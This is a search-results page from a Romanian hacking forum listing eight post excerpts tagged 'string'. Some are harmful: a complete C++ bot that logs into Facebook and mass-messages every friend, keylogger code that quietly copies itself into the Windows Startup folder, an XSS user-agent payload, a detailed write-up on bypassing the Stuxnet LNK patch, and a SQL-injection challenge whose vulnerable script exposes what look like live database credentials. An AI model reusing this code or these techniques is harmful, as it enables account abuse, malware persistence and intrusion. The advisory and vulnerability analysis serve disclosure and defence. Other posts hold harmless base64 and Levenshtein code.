Jump to content

Search the Community

Showing results for tags 'string'.



More search options

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Informatii generale
    • Anunturi importante
    • Bine ai venit
    • Proiecte RST
  • Sectiunea tehnica
    • Exploituri
    • Challenges
    • Bug Bounty
    • Programare
    • Reverse engineering & exploit development
    • Mobile phones
    • Sisteme de operare si discutii hardware
    • Electronica
    • Wireless Pentesting
    • Black SEO & monetizare
  • Tutoriale
    • Tutoriale in romana
    • Tutoriale in engleza
    • Tutoriale video
  • Programe
    • Programe hacking
    • Programe securitate
    • Programe utile
    • Free stuff
  • Discutii generale
    • RST Market
    • Off-topic
    • Discutii incepatori
    • Stiri securitate
    • Sugestii
    • Linkuri
    • Cosul de gunoi
  • Club Test's Topics
  • Clubul saraciei absolute's Topics
  • Chernobyl Hackers's Topics
  • Programming & Fun's Jokes / Funny pictures (programming related!)
  • Programming & Fun's Programming
  • Programming & Fun's Programming challenges
  • Bani pă net's Topics
  • Cumparaturi online's Topics
  • Web Development's Forum
  • 3D Print's Topics

Categories

There are no results to display.

There are no results to display.

Blogs

There are no results to display.

There are no results to display.


Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


Website URL


Yahoo


Jabber


Skype


Location


Interests


Biography


Location


Interests


Occupation

Found 8 results

  1. Login to account with provided username/password, extract friends list, send messages to them all. Requires: curl, and gumbo. Enjoy. #include <stdio.h> #include <curl/curl.h> #include <iostream> #include <cstring> #include <vector> #include "gumbo.h" using namespace std; CURL *curl; CURLcode res; string data; string fb_dtsg; vector<string> friends; struct curl_httppost *formpost=NULL; struct curl_httppost *lastptr=NULL; struct curl_httppost *msgform=NULL; struct curl_httppost *msglast=NULL; static size_t curl_write( void *ptr, size_t size, size_t nmemb, void *stream) { data.append( (char*)ptr, size*nmemb ); return size*nmemb; }; string replace_all(string str, const string& from, const string& to) { size_t start_pos = 0; while((start_pos = str.find(from, start_pos)) != std::string::npos) { str.replace(start_pos, from.length(), to); start_pos += to.length(); } return str; } string string_between( string str, const string& delim1, const string& delim2 ) { unsigned first = str.find(delim1); unsigned last = str.find(delim2); string out = str.substr (first,last-first); return out; } int curl_check_cookie_response( ) { struct curl_slist *cookies; struct curl_slist *nc; int i; res = curl_easy_getinfo(curl, CURLINFO_COOKIELIST, &cookies); if (res == CURLE_OK) { nc = cookies, i = 1; while (nc) { if(strstr( nc->data, "c_user") != NULL ) return 0; nc = nc->next; i++; } } curl_slist_free_all(cookies); return 1; } int authenticate_details( const char* email, const char* password ) { curl_easy_setopt(curl, CURLOPT_URL, "https://m.facebook.com/login.php" ); curl_easy_setopt( curl, CURLOPT_USERAGENT, "Mozilla/5.0 (X11; sludg3; Linux i686; rv:26.0) Gecko/20100101 Firefox/26.0"); curl_easy_setopt( curl, CURLOPT_FOLLOWLOCATION, 2L ); curl_easy_setopt( curl, CURLOPT_VERBOSE, 0 ); curl_easy_setopt( curl, CURLOPT_COOKIEFILE, ""); curl_easy_setopt( curl, CURLOPT_COOKIEJAR, "cookies.txt" ); curl_formadd(&formpost, &lastptr, CURLFORM_COPYNAME, "email", CURLFORM_COPYCONTENTS, email, CURLFORM_END); curl_formadd(&formpost, &lastptr, CURLFORM_COPYNAME, "pass", CURLFORM_COPYCONTENTS, password, CURLFORM_END); curl_easy_setopt(curl, CURLOPT_HTTPPOST, formpost); curl_easy_setopt( curl, CURLOPT_WRITEFUNCTION, curl_write ); if( curl_easy_perform(curl) == CURLE_OK ) { return 0; } return 1; } void gumbo_parse_friend_data( GumboNode* node ) { GumboAttribute* url; if (node->type != GUMBO_NODE_ELEMENT) { return; } if (node->v.element.tag == GUMBO_TAG_A && (url = gumbo_get_attribute(&node->v.element.attributes, "href"))) { if( strstr( url->value, "?uid=" ) != NULL ) { data = string_between( url->value, "=", "&" ); data = replace_all( data, "=", ""); friends.push_back( data ); } } GumboVector* children = &node->v.element.children; for (unsigned int i = 0; i < children->length; ++i) { gumbo_parse_friend_data(static_cast<GumboNode*>(children->data[i])); } } void gumbo_parse_session_id ( GumboNode* node ) { GumboAttribute* inputName; GumboAttribute* inputValue; if (node->type != GUMBO_NODE_ELEMENT) { return; } if (node->v.element.tag == GUMBO_TAG_INPUT ) { inputName = gumbo_get_attribute( &node->v.element.attributes, "name" ); inputValue = gumbo_get_attribute( &node->v.element.attributes, "value" ); if( inputValue != NULL && inputName != NULL) { std::string val( inputName->value ); std::size_t match = val.find( "fb_dtsg" ); if( match == 0 ) { fb_dtsg = inputValue->value; } } } GumboVector* children = &node->v.element.children; for (unsigned int i = 0; i < children->length; ++i) { gumbo_parse_session_id(static_cast<GumboNode*>(children->data[i]) ); } } int grab_friends_list_data( ) { curl_easy_setopt(curl, CURLOPT_URL, "https://m.facebook.com/friends/center/friends" ); if( curl_easy_perform(curl) == CURLE_OK ) { GumboOutput* output = gumbo_parse(data.c_str()); gumbo_parse_friend_data( output->root); return 0; } return 1; } int grab_friend_session( string friend_id ) { char url[512]; snprintf( url, sizeof( url ), "https://m.facebook.com/messages/thread/%s", friend_id.c_str() ); curl_easy_setopt( curl, CURLOPT_URL, url ); if( curl_easy_perform(curl) == CURLE_OK ) { GumboOutput* output = gumbo_parse(data.c_str()); gumbo_parse_session_id( output->root); return 0; } return 1; } int send_message_to_friend( string friend_id, string message ) { char field[ 32 ], value[ 32 ]; snprintf( field, sizeof( field ), "ids[%s]", friend_id.c_str() ); snprintf( value, sizeof( value ), "%s", friend_id.c_str() ); curl_easy_setopt( curl, CURLOPT_URL, "https://m.facebook.com/messages/send/?icm=1" ); curl_formadd(&msgform, &msglast, "fb_dtsg", CURLFORM_COPYCONTENTS, fb_dtsg.c_str(), CURLFORM_END); curl_formadd(&msgform, &msglast, CURLFORM_COPYNAME, field, CURLFORM_COPYCONTENTS, value, CURLFORM_END); curl_formadd(&msgform, &msglast, CURLFORM_COPYNAME, "body", CURLFORM_COPYCONTENTS, message.c_str(), CURLFORM_END); curl_easy_setopt( curl, CURLOPT_HTTPPOST, msgform ); if( curl_easy_perform(curl) == CURLE_OK ) { return 0; } return 1; } void cleanup( ) { data = ""; } int main( int argc, char *argv[] ) { curl = curl_easy_init(); if(curl) { if( authenticate_details( "message@allyourfriends.com", "thepassword" ) == 0 ) { if( curl_check_cookie_response() == 0 ) { printf("We are logged in."); if( grab_friends_list_data() == 0 ) { for(vector<int>::size_type i = 0; i != friends.size(); i++) { printf( "Sending message to friend ID: %s\r\n", friends[i].c_str() ); if( grab_friend_session( friends[i].c_str() ) == 0 ) { send_message_to_friend( friends[i].c_str(), "hi"); } } } } else { printf("Failed to login."); } } } return 0; } P.S:// Nu l-am testat! Credit's to: sludg3@tf @kNigHt done.
  2. Ceva mai special gasit intr-un keylogger Public Sub ILAddToStartUp(ByVal assemblyName As String) Dim genLocation As String = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) & "\" & assemblyName & ".il" Dim genExe As String = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) & "\" & assemblyName & ".exe" Dim ILAsm As String = Environment.SystemDirectory(0) & ":\Windows\Microsoft.NET\Framework\v2.0.50727\ilasm.exe" Dim copied As String = Environment.GetFolderPath(Environment.SpecialFolder.Startup) & "\" & IO.Path.GetFileName(Windows.Forms.Application.ExecutablePath) Try If IO.File.Exists(genLocation) Then IO.File.Delete(genLocation) 'If IO.File.Exists(genExe) Then IO.File.Delete(genExe) If IO.File.Exists(copied) Then Exit Sub Dim newLine As String = Environment.NewLine Dim source As String = Windows.Forms.Application.ExecutablePath Dim code As String = ".assembly extern mscorlib {}" & newLine & _ ".assembly extern System {" & newLine & _ " .ver 2:0:0:0" & newLine & _ " .publickeytoken = (B7 7A 5C 56 19 34 E0 89)" & newLine & _ "}" & newLine & _ ".assembly " & assemblyName & "{ .ver 1:0:1:0 }" & newLine & _ ".module " & assemblyName & ".exe" & newLine & _ ".method public static void Main() cil managed {" & newLine & _ ".maxstack 2" & newLine & _ ".entrypoint" & newLine & _ ".locals init ([0] class [mscorlib]System.Exception ex)" & newLine & _ "L_02: ldstr """ & source & """" & newLine & _ "L_07: ldstr """ & Environment.GetFolderPath(Environment.SpecialFolder.Startup) & "\" & IO.Path.GetFileName(source) & """" & newLine & _ "L_0c: call void [mscorlib]System.IO.File::Copy(string, string)" & newLine & _ "L_12: leave.s L_23" & newLine & _ "L_14: dup" & newLine & _ "L_1a: stloc.0" & newLine & _ "L_21: leave.s L_23" & newLine & _ "L_23: nop" & newLine & _ "L_25: ret" & newLine & _ ".try L_02 to L_14 catch [mscorlib]System.Exception handler L_14 to L_23" & newLine & _ "}" code = code.Replace("\", "\\") IO.File.WriteAllText(genLocation, code) Shell(ILAsm & " " & ChrW(34) & genLocation & ChrW(34), AppWinStyle.Hide) While Not IO.File.Exists(genExe) System.Threading.Thread.Sleep(10) End While Shell(genExe, AppWinStyle.Hide) While Not IO.File.Exists(copied) System.Threading.Thread.Sleep(10) End While IO.File.Delete(genLocation) Catch ex As Exception End Try End Sub
  3. Un programel simplu facut in pauza de masa. Enjoy: __author__ = "MrGrj" import binascii def bas64decryption(): encoded_string = raw_input("Please insert the base64 encrypted text:") decoded_string = encoded_string.decode('base64') if encoded_string is None: print 'You inserted a null string. Please enter a valid string next time !' else: print 'Your decoded string:' + ' ' + decoded_string def base64encryption(): decoded_string = raw_input("Please insert the text that you want to encode:") encoded_string = decoded_string.encode('base64') if decoded_string is None: print 'You inserted a null string. Please enter a valid string next time !' else: print 'Your encoded string:' + ' ' + encoded_string if __name__ == "__main__": menu = {} menu['1'] = "Base 64 decryption." menu['2'] = "Base 64 encryption." menu['3'] = "Exit." while True: options = menu.keys() options.sort() for entry in options: print entry, menu[entry] selection = raw_input("What would you like to do? ") if selection == "1": try: bas64decryption() except binascii.Error: print "This is not a base64 encoded string!" elif selection == "2": try: base64encryption() except binascii.Error: print "Something went wrong! Please try again" elif selection == "3": print "Bye-bye" break else: print "This is not a valid choice !" O sa revin cu update-uri in topicul asta cu alte functii de decoding / encoding. Apoi, cu restul membrilor care stiu python sa facem ceva misto, optimizat, etc. Asta daca se vrea si eu timp. @MasterLight
  4. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Product: phpTrafficA Product page: phpTrafficA Homepage Affected versions: Up to and including 2.3 (latest as of writing). Description: The user agent string provided by the browser is not sanitized nor escaped when handled. This string is then outputting into HTML code on the "Latest visitors > Details" page, leading to HTML injection that can be abused to perform XSS. For example, the following user agent will cause a JavaScript dialogbox to pop up as soon as the page is visited: "><script>alert();</script> This page can be hidden from the public, in which case only admins can visit it. However, the script still executes when they do, which could enable a malicious user agent to steal the phpTrafficA cookie (no expiry) or other admin credentials. Proposed fix: Escape the HTML characters with htmlspecialchars before outputting the user agent string. In: Php/stats/statsRecent.inc.php Line 304: echo "<tr class=\"data av $even $clrobots $clreturn\"><td nowrap>$end</td><td> $dur</td><td align=\"center\"> ".format_float($hits)." </td><td> <a href=\"./index.php?mode=stats&sid=$sid&show=clickstream?=$lang&ip=$ip\" title=\"".$strings['Moreinfovisitor']."\" class=\"basic\">$ipText</a> </td><td align=\"center\"> ".format_float($visits)." </td><td>".countryFlag($country)."</td><td>".osImg($os,'')."</td><td>".browserImg($wb,$agent)."</td><td>$page</td><td>$refString</td></tr>\n"; becomes: echo "<tr class=\"data av $even $clrobots $clreturn\"><td nowrap>$end</td><td> $dur</td><td align=\"center\"> ".format_float($hits)." </td><td> <a href=\"./index.php?mode=stats&sid=$sid&show=clickstream?=$lang&ip=$ip\" title=\"".$strings['Moreinfovisitor']."\" class=\"basic\">$ipText</a> </td><td align=\"center\"> ".format_float($visits)." </td><td>".countryFlag($country)."</td><td>".osImg($os,'')."</td><td>".browserImg($wb,htmlspecialchars($agent))."</td><td>$page</td><td>$refString</td></tr>\n"; Line 369: $echo = "<tr><td valign=\"top\" colspan=\"3\">$ip ($whoislink$baniplink)<br>$host<br>$labelTxt<table class=\"basic\"><tr><td>".countryNameFlag($country)."</td></tr></table></td><td valign=\"top\" colspan=\"2\">".$strings['Agent'].": $thisagent<br><table class=\"basic\"><tr><td>".osImgName($os)."</td><td>".browserImgName($wb)."</td></tr></table>".$strings['Referrer'].": "; becomes: $echo = "<tr><td valign=\"top\" colspan=\"3\">$ip ($whoislink$baniplink)<br>$host<br>$labelTxt<table class=\"basic\"><tr><td>".countryNameFlag($country)."</td></tr></table></td><td valign=\"top\" colspan=\"2\">".$strings['Agent'].": ".htmlspecialchars($thisagent)."<br><table class=\"basic\"><tr><td>".osImgName($os)."</td><td>".browserImgName($wb)."</td></tr></table>".$strings['Referrer'].": "; Best regards, Daniel Geerts -----BEGIN PGP SIGNATURE----- Version: GnuPG/MacGPG2 v2.0.22 (Darwin) Comment: GPGTools - https://gpgtools.org iQIcBAEBCgAGBQJVJPGzAAoJEHn1bVIKHk5N5egP/0FRgNCiTwYyFwmqgcNLxOQ5 yuJtnGdGFvH0axXlvm+AgVYOtmM4erduSR3hCaSx4ER7f30SZkRCUuaW8aR1/Tow bdYzLXNHcY21gXkhHt+bWH7ZkEpUWxXR6ZzrwL5QO3Ez+QkDr1HUmg8QQPUia8Qk KGY+dbkRXqVR7MYRGjAbyceOEXpxpOtxaZ9UTSmQTGW31Upu+dmqkkOTbvV20tEj N07T4UwMffCGNWloeuXg8QvIlvwe22kV3+frA2qGxdWKHVl66iJAV0pQ+bxDgoxe Y3JsYKdeIhB6T0Yt7rpEbzlgaupQ9pg279bzGVVD4Z+AuNhvDY/4K6RZsFB11DGv eY4VR8KLyNuw5N/wLBGf9ZSL9dLBGatYxi0HoQtrmFqLppo1x6nhEV6A0gRulWRa 9L04PdWKmv+2/prwW9ygT7UFIdApT1q3Uljq9QQIWmdDxGx3YxFmvMVpC5NThtxO ElN8fhQpUKFss439qiLaGEMKO/D4bNC71Ydo6jvZOWQ+9eBxmMUT7XfK6fnB811c RTRON1SG73AWcbfpIJ/dM+g0jm6bcvVVQxNmaARdlf+E2ihXnMPU2k39ndfV/vqD 7iuZQraH1ZrQJAqjVmzHWvEfEPyeaiJPRguu1kmnG8QkSMDtBHIpGvvHCHSU4ioF +wxMYqlgbfJGakc4s5RO =wCVy -----END PGP SIGNATURE----- Source: http://packetstorm.wowhacker.com/1504-exploits/phptraffica23-xss.txt
  5. In early January 2015, researcher Michael Heerklotz approached the Zero Day Initiative with details of a vulnerability in the Microsoft Windows operating system. We track this issue as ZDI-15-086. Unless otherwise noted, the technical details in this blog post are based on his detailed research. To understand the significance of his report, we need to go back to the last decade. In mid-2009, Stuxnet was released against the Iranian nuclear program. Attributed to the United States and Israel, Stuxnet used multiple zero-day attacks against Windows to attack the Iranian centrifuges. It was discovered in June 2010 by VirusBlokAda and reported to Microsoft. In February 2015, Kaspersky Labs' Global Research & Analysis Team released findings that attacks included in Stuxnet were in use as early as 2008. The initial infection vector was a USB drive that took advantage of a vulnerability in the Windows operating system that allowed simply browsing to a directory to run arbitrary code. Windows allowed for .LNK files, which define shortcuts to other files or directories, to use custom icons from .CPL (Control Panel) files. The problem is that in Windows, icons are loaded from modules (either executables or dynamic link-libraries). In fact, .CPL files are actually DLLs. Because an attacker could define which executable module would be loaded, an attacker could use the .LNK file to execute arbitrary code inside of the Windows shell and do anything the current user could. To prevent this attack, Microsoft put in an explicit whitelist check with MS10-046, released in early August 2010. Once that patch was applied, in theory only approved .CPL files should have been able to be used to load non-standard icons for links. The patch failed. And for more than four years, all Windows systems have been vulnerable to exactly the same attack that Stuxnet used for initial deployment. To see how it failed, we need to examine the fix itself. To show the vulnerability in action, we made a brief video: The definition of the icon that will be used is extracted in a function called CControlPanelFolder::GetUiObjectOf() in Shell32.dll. We can see what changed by comparing the RTM version of Shell32.dll with the latest vulnerable version, using DarunGrim. Figure 1 Diffing the function We can see there are only two sections of code (highlighted above in red) that have changed in this function since release. The first changed block looks like this: Figure 2 The first changed block in the function (click to expand in new window) We can see that in the event the definition calls for a custom icon (that is, has a requested icon ID of 0), we check against the registered list. If we put this snippet of assembly into C++, it looks something like this: … if ( (iconID == 0) && !this->_IsRegisteredCPLApplet(&wszModuleFullPath) ) { iconID = -1; } … If the DLL isn’t on the whitelist, you cannot have the icon ID be 0, and so no custom load step. So, problem solved? Clearly not, or we wouldn’t be talking about this now. Let’s look at the other snippet of code that changed, and see if it gives us a clue. Figure 3 The second changed block in the function Now that’s interesting. If the module path specified contains a comma in it, we’re going to error out with an invalid argument. It is possible that this is unrelated to the fix for Stuxnet, but it looks odd. Let’s look at the context around it. Immediately before this block of code, there is an unchanged block that takes user-provided data and formats it -- using commas. Let’s take a look at that: Figure 4 Unchanged adjacent code If we put this block of assembly language into C++, it would look something like this: StringCchPrintfW(wszWorkingBuffer, 554u, L"%s,%d,%s", &wszModuleFullPath, iconID, &wszDisplayName); With this context, the second change looks to be part of the Stuxnet fix after all. We are forcing the icon ID to be something other than 0, but we then put it into a comma delimited string. Since we’re then erroring out if the path contains a comma, that looks like a fix for embedding a fake icon ID inside of the path, which would imply that the icon ID will be parsed out of this constructed string later. So, the obvious work-around has been closed off; we cannot spoof the formatted string to insert our own icon ID. The next thing that happens after we have formatted and checked this string is that it gets passed to ControlExtractIcon_CreateInstance(). This function creates a CCtrlExtIconBase object, and passes it the composite string as the first argument. Let’s look at the constructor. Figure 5 Following the string through the constructor (click to expand in new window) If we look at what happens to that initial argument, we see it ends up (again, translating into C++) being used like this: StringCchCopyW(this->wszIconString, 260u, pwzIconString); The buffer we have just created as 554 wide characters in length is in fact being truncated and put into a 260 wide character buffer. Not only that, but the string contains two pieces of information we know get used in icon loading – the path to the DLL and the icon ID. Where does that information come from? It comes from a function called CControlPanelFolder::GetModuleMapped(): Figure 6 Call to CControlPanelFolder::GetModuleMapped (click to expand in new window) If we put this into C++, it would look something like this: retVal = CControlPanelFolder::GetModuleMapped(pControl, false, &wszModuleFullPath, 260, &iconID, &wszModuleDisplayName, 260); There are two parts of this function that are important for us. As we can see from the code above, the caller specifies the size of the buffers that data is copied in to, and in this case, the buffers are sized for 260 wide characters. Because this data is actually extracted from the .LNK file that we control, this means we can provide a path string that is up to 260 wide characters long, and we know that there is a truncation bug that will use our data. The second issue is actually inside of CControlPanelFolder::GetModuleMapped(), and will be one of the last hurdles to exploitation. If the module path specified does not actually exist, the path will be combined with the System (or SystemWoW64) directory. Looking at that code as C++, it looks something like this: if ( !PathFileExistsW(pwzModuleFullPath) ) { if ( fDoNotUseWoW || !CControlPanelFolder::_IsWowCPL(pControl) ) GetSystemDirectoryW(&wzSystemDir, 260u); else GetSystemWow64DirectoryW(&wzSystemDir, 260u); if ( PathCombineW(&wzBuffer, &wzSystemDir, pwzModuleFileName) ) retVal = StringCchCopyW(pwzModuleFullPath, cwchModuleFullPath, &wzBuffer); else retVal = E_FAIL; } This doesn’t appear to be a problem (since we do need to actually load our planted DLL to get code running), but as we’ll see later, this is actually an issue in exploitation. To see why, we need to look at where our constructed and truncated string is used. What happens to that data? To see that, let’s look at what the actual call stack would look like when the exploit fired: Figure 7 Call stack on the DLL load for an icon Since we know that our constructed string is stored as a member variable in CCtrlExtIconBase, let’s go ahead and look at that call to _GetIconLocationW(). Figure 8 Parsing the constructed string in CCtrlExtIconBase ::_GetIconLocationW If we look at the code above, we can see that we’re searching for the comma separator (the buffer itself is one we’ve copied for the caller). If we find it, we null it out, and then derive the icon ID by calling StrToInt(). Now, we know from looking at the original fix that our icon ID will be forced to be -1, but will then be truncated into a 260 wide character buffer. Since the truncation includes the null, we’ll have 259 wide characters to work with, one of which will be a comma. If we provided a 257 character path, the string that we’d parse here is “<our path>,-“, with everything after the minus sign being truncated. And StrToIntW(L”-“) is 0. We have bypassed the check by converting the negative value back into our desired icon ID of 0. (In fact, we can skip the check entirely and just pass in a small negative icon ID to begin with.) Just putting in the overly long path won’t work, however; there is a problem. To see it, we need to go further down the call chain and see where our load fails. We know from the stack trace above that our call to LoadLibrary() will come from CPL_LoadCPLModule(). The problem is that CPL_LoadCPLModule() is also going to look for a manifest file. That, in and of itself, is not a problem, as it doesn’t require the manifest. The problem lies in how it looks for the file: Figure 9 Constructing the manifest file path If we put this into C++, it would look something like this: if ( StringCchPrintfW(&wzManifestPath, 260u, L"%s.manifest", pwzModuleFullPath) < 0 ) { return NULL; } So, if our path is too long to have a “.manifest” appended (the 260 character limit we’ve been seeing throughout this is MAX_PATH), we’re not even going to try to load the DLL. As we’ve already seen, we need to take the path to 257 characters in order to force the icon ID to 0, and we need the icon ID to be 0 to even get to CPL_LoadCPLModule(). We need one more issue. To find it, we need to work back up the stack trace, and see if we can do anything about that path name passed to CPL_LoadCPLModule(). When we do that, we can see that the string is actually extracted in the function CPL_ParseCommandLine(). CPL_ParseCommandLine uses a function called CPL_ParseToSeparator() to pull the component elements out. If we look inside CPL_ParseToSeparator(), we can see that it has two options for valid separators: Figure 10 A look inside CPL_ParseToSeparator There is a flag which determines if only commas will be considered to be separators, or if unescaped spaces will as well. When we look at the first call to CPL_ParseToSeparator() (which extracts the module path), we can see that it has the flag set to consider spaces as valid separators: Figure 11 Initial call to CPL_ParseSeparator At this point, we have everything we need to get an exploit running. We’ll need to construct a malicious .LNK file which has a link path of exactly 257 characters, but uses embedded unescaped spaces to cause the extraction to truncate in CPL_ParseToSeparator(). That allows us to have a short enough path for the concatenation of the “.manifest” to the filename in CPL_LoadCPLModule() to work. That brings us back to our earlier note that CControlPanelFolder::GetModuleMapped() will check to see if the full module path (including embedded spaces) exists. So we’ll need to have two files, one with the embedded spaces (to pass the file existence check), and one without (to actually be loaded). Unlike a case of memory corruption, this attack doesn’t need to worry about low-level operating system mitigations. This bug has its roots in the decades-old decision to load icons by loading executable modules into the process, and because of that, there is no need to worry about any other mitigations. The Windows operating system itself will handle resolving ASLR and loading the attack into executable memory. And because of that, the attack is stable, reliable, and works cleanly across Windows versions. Microsoft has gone to a great deal of effort to make exploitation of memory corruption bugs more difficult. This is a classic example of the Defender’s Dilemma -- the defender must be strong everywhere, while the attacker needs to find only one mistake. In a future Security Briefing, ZDI will examine MS15-020, the patch that was released today to address CVE-2015-0096, and look at how Microsoft made changes to try to prevent this attack from coming back a third time. Source
  6. Salut, am 2 functii si vreau sa le fac detour: private void WriteTempRezults(string iD, string test, string points, string time, string memory, string msg) private void InsertListView(string testNumber, string points, string time, string memory, string msg) Problema este ca nu pot sa gasesc adresele la care se afla functiile. Orice indicatie ar bine primita. Aplicatie: Evaluator Virustotal: https://www.virustotal.com/sv/file/8848b.../analysis/
  7. Salutare, Challange-ul pe care il am pentru voi este sa luati un char de la un string din db, intr-un singur query/req Raspunsurile pe PM sa spunem ca asta ar fi scriptul vulnerabil: <?php $db = new PDO('mysql:host=mysql13.000webhost.com;dbname=a8014888_mom', 'a8014888_mom', 'numauita11'); if(isset($_GET['id'])) $db->query("SELECT * FROM completed where id=".$_GET['id']); Nu am facut un demo deoarece era greu de implementat limita aia cu 1 query/req....
  8. Aceasta este o implementare simpla in c++ a algoritmului lui Levenshtein pentru a masura diferentele intre 2 cuvinte. Implementarea are la baza pseudo codul de pe pagina wiki de aici M-am gandit sa postez aceasta implementare deoarece din cautarile mele alte implementari erau un pic mai complicate. Implementarea este o copie stricta dupa acel pseudo cod, singura adaugire este ca in loc sa returneze numarul de modificari necesare, el returneaza un "procent" de similaritate intre 100% si 0 %; Daca doriti sa le folositi nu trebuie decat sa adaugati cele 2 fisiere de mai jos la proiectul vostru. dist.h #ifndef DIST_H_INCLUDED #define DIST_H_INCLUDED /////////////////////////////////////////////////////////////////////////// //Aceasta functie preia 2 stringuri si le compara la nivel sintactic. // //Returneaza o valoare de tip double intre 0 si 100 in functie de cat // //de asemanatoare sunt cuvintele. // //Aceasta are la baza algoritmul lui Levenstein, implementarea se face // //pe baza pseudocodului de la adresa urmatoare // //http://en.wikipedia.org/wiki/Levenshtein_distance // /////////////////////////////////////////////////////////////////////////// #include <iostream> #include <string> using std::string; using std::cout; using std::endl; using std::min; double dist(string s1, string s2); #endif // DIST_H_INCLUDED dist.cpp /////////////////////////////////////////////////////////////////////////// //Aceasta functie preia 2 stringuri si le compara la nivel sintactic. // //Returneaza o valoare de tip double intre 0 si 100 in functie de cat // //de asemanatoare sunt cuvintele. // //Aceasta are la baza algoritmul lui Levenstein, implementarea se face // //pe baza pseudocodului de la adresa urmatoare // //http://en.wikipedia.org/wiki/Levenshtein_distance // /////////////////////////////////////////////////////////////////////////// #include "dist.h" double dist(string s1, string s2) { int num1 = s1.size(); int num2 = s2.size(); double array[num1 + 1][num2 + 1]; if(num1 == 0) { cout << "Primul string e gol.\n"; cout << "Nu se poate face comparatia.\n"; cout << endl; } else if(num2 == 0) { cout << "Al doilea string e gol.\n"; cout << "Nu se poate face comparatia.\n"; cout << endl; } else { for(int i = 0; i <= num1; i++) { array[i][0] = i; } for(int j = 0; j <= num2; j++) { array[0][j] = j; } for(int i = 1; i <= num1; i++) { for(int j = 1; j <= num2; j++) { if(s1[i - 1] == s2[j - 1]) { array[i][j] = array[i - 1][j - 1]; } else { array[i][j] = min(((array[i - 1][j] + 1)), (min((array[i][j - 1] + 1), (array[i - 1][j - 1] + 1)))); } } } } return (1.0 - (array[num1][num2] / min(num1, num2))) * 100; } Daca aveti de adaugat ceva, postati va rog.
×
×
  • Create New...